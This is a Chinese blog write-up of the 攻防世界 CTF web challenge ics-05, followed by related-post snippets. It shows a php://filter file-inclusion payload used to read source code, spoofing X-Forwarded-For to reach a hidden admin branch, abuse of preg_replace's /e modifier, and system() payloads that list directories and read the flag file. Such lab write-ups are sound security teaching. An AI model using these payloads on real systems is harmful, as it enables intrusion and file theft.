攻防世界 ics-05

于 2024-09-09 19:36:11 发布
阅读量243 收藏 4
点赞数 1
分类专栏: # 攻防世界 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/beiweixiaotian66/article/details/142067244
版权

ics-05

隐藏的变量传参,php弱类型比较

只有设备维护中心可以点击进去

img

查看源码,发现有个隐藏的超链接变量传参

img

看到变量传参,有可能存在文件包含漏洞读取源码,这个站是php的站,所以可以使用php伪协议读取源码

index.php?page=php://filter/read=convert.base64-encode/resource=index.php

img

base解码,可以看到漏洞点在这里

<?php
//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}
?>

分析一下,传入了三个变量pat,rep,sub

preg_replace:执行一个正则表达式的搜索和替换
● pattern 要搜索的模式。可以是一个字符串或字符串数组。  
● replacement 用于替换的字符串或字符串数组。如果这个参数是一个字符串,并且 pattern 是一个数组,那么所有的模式都使用这个字符串进行替换。  
● subject要进行搜索和替换的字符串或字符串数组。
● limit 每个模式在每个 subject 上进行替换的最大次数。默认是 -1(无限)。
● count 如果指定,将会被填充为完成的替换次数。

找到这个函数存在的漏洞就是当$pattern使用了/e修正符的时候,替换的时候会将$replacement替换进去的代码当成php执行

img

所以先抓包,添加一个X-Forwarded-For

img

接着查看可疑文件,用%20代替空格 %26代替&,%20%26是它们的url编码

命令联合执行
;     前面的执行完执行后面的
|     管道符,上一条命令的输出,作为下一条命令的参数(显示后面的执行结果)         
||    当前面的执行出错时(为假)执行后面的
&     将任务置于后台执行
&&    前面的语句为假则直接出错,后面的也不执行,前面只能为真
%0a  (换行)
%0d  (回车)
system("ls%20s3chahahaDir")     
system("cd%20s3chahahaDir%26%26ls")

img

继续查看文件内容

system("ls%20s3chahahaDir/flag")
system("cd%20s3chahahaDir/flag")

img

拿到flag

system("cat%20s3chahahaDir/flag/flag.php")
system("cd%20s3chahahaDir/flag%26%26cat%20flag.php")

img

攻防世界XCTF:ics-05_xctf-insc05-CSDN博客

Cyan1u
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | XCTF】攻防世界 ics-05 解题详析
等风来
05-31 3785
题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统。在当前目录及其子目录中查找文件名中包含 xx 的文件,如。构造Payload如下,实现将sub中的。根据提示,进入维护中心页面。查看源代码 发现注入点。
[XCTF_网络安全] 攻防世界 ics-05 解题详析
qingkahui24689的博客
05-24 708
[XCTF_网络安全] 攻防世界 ics-05 解题详析,该题考察XFF及/e修正符的相关知识。
攻防世界 ics-05 wp
freerats的博客
06-04 315
题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 打开设备维护中心页面上没什么,查看源码发现?page=index 看到这个可能存在文件包含读源码的漏洞 php://filter/read=convert.base64-encode/resource=index.php 使用php协议读取index.php页面的base64格式,解码即可得到源码 源码比较长,核心部分就是以下这一段 这里的主要考点就是preg_replace()命令执行漏洞 官方的解释是 mixed preg_replac
攻防世界ics-05
wangzhemvp的博客
04-05 684
提示:要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误。使用 /e 修饰符,preg_replace 会将 replacement 参数当作 PHP 代码执行。php://filter 伪协议查看源码 + preg_replace 函数漏洞。1.获取网页源代码。多点点界面,发现点云平台设备维护中心时,页面发生变化。page=index 输入什么显示什么,有回显。用php://filter读取网页源代码。
攻防世界ics-05
qq_45955869的博客
05-30 51
提示:攻防世界ics-051.伪协议2.preg_place漏洞。
攻防世界——ics-05
m0_62063669的博客
06-21 2322
攻防世界——ics-05,打开题目场景,进入设备维护中心,将所有可点击的地方都点了一遍,发现只有设备维护中心可以打开在源代码中发现page=index写入参数,参数会在页面中显示有参数的话,可以尝试以下XSS(没有任何反应,失败)LFI(Local File Inclusion) 本地文件包含漏洞,指的是能打开并包含本地文件的漏洞 LFI漏洞的黑盒判断方法:如果只从URL判断,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键词,就可能存在文件包含漏洞。..
攻防世界-ics-05
m0_62094846的博客
11-17 2158
点开后发现只有设备维护中心可以点开 看到数据端口请求异常,先想到用burp修改域名,但是修改后 除了加了一句话没什么用 看看源代码,有page=index(看wp的,真想不到和文件包含有关) ?page=php://filter/read=convert.base64-encode/resource=index.php 应该是base64 <?php error_reporting(0); @session_start(); posix_setuid(1...
攻防世界 ics-05 write up
weixin_30872157的博客
09-20 206
访问,由于提示说是后台,所以访问index.php/my-webshell(路径任意) 发现是文件包含页面 http://111.198.29.45:42305/index.php/dsf?page=php://filter/read=convert.base64-encode/resource=index.phpbase64decode重点:if ($_SERVER['HTT...
[wp] 攻防世界 ics-05
MercyLin的博客
09-06 1282
进入题目发现也只有设备维护中心的选项可以点 page传的参数在页面会有回显,fuzz一下:
攻防世界(web篇)---ics-05
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-16 1313
根据提示点击进入设备维护中心(其他页面也点不开) 发现页面也没什么可以点击的地方,乱点了几下发现云平台设备维护中心是可以点击的,虽然还是同一个页面,但是多了个get参数 不可行读取源码看看直接包含发现会直接运行php文件,那我们怎么获得源码呢,很简单,include函数只会将php文件进行执行,我们只需要将传进去的文件先进行base64编码再传给它,就会输出它的内容了,也就是源码: $_SERVER[‘HTTP_X_FORWARDED_FOR’] 这个需要请求加 preg_replace /e参数
【网络安全 | CTF】攻防世界 ics-06 解题详析
等风来
05-20 3793
题目描述:云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,留下了入侵者的痕迹。仅栏能打开新窗口:注意到URL栏的id参数,对id进行爆破。
攻防世界-WEB进阶-ics-06(Burpsuite爆破使用)
m0_46267075的博客
05-26 4565
尝试
基于spring boot 的流浪动物管理系统毕业论文.docx
09-09
基于spring boot 的流浪动物管理系统毕业论文.docx
C语言经典算法100例 - 快捷方式.lnk
09-09
C语言经典算法100例 - 快捷方式.lnk
基于ssm的化妆品配方及工艺管理系统的设计与实现.docx
最新发布
09-09
基于ssm的化妆品配方及工艺管理系统的设计与实现.docx
电子设计项目毕业设计论文正弦信号发生器示列资料
09-09
本资源只包含论文文档,电子设计项目毕业设计论文文档正弦信号发生器示列资料提取方式是百度网盘分享地址
双向 2 电平 AC-DC 转换器平均模型simulink.rar
09-09
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。
高压+IGBT-+IXGT6N170-中文数据手册.pdf
09-09
高压+IGBT-+IXGT6N170-中文数据手册
攻防世界ics-06
08-12
对不起,你提供的引用内容没有包含任何问题。请提供一个明确的问题,我将很乐意帮助你回答。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [攻防世界--ics-06](https://blog.csdn.net/m0_67467924/article/details/129679123)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [攻防世界Webics-06、unserialize3、supersqli”题解](https://blog.csdn.net/qq_53325209/article/details/124255388)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值